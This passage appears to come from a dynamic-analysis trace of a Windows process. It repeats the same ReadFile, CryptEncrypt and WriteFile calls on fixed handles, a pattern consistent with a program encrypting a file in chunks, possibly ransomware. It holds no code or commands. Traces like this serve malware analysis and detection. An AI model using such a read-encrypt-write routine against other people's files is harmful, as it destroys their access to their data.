| out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.220] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.220] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.220] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.221] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.221] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.221] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.221] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.221] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.221] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.221] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.222] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.222] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.222] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.222] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.222] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.222] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.223] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.223] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.223] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.223] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.223] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.223] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.223] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.223] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.223] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.223] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.223] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.223] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.224] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.224] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.224] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.224] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.224] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.224] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.224] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.226] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.226] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.226] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.226] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.226] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.226] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.226] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.226] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.226] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.227] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.227] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.227] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.227] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.227] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.228] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.228] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.229] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.229] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.229] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.229] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.229] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.229] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.229] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.229] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.229] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.230] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.230] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.230] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.230] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.230] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.230] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.230] CryptEncrypt (in: 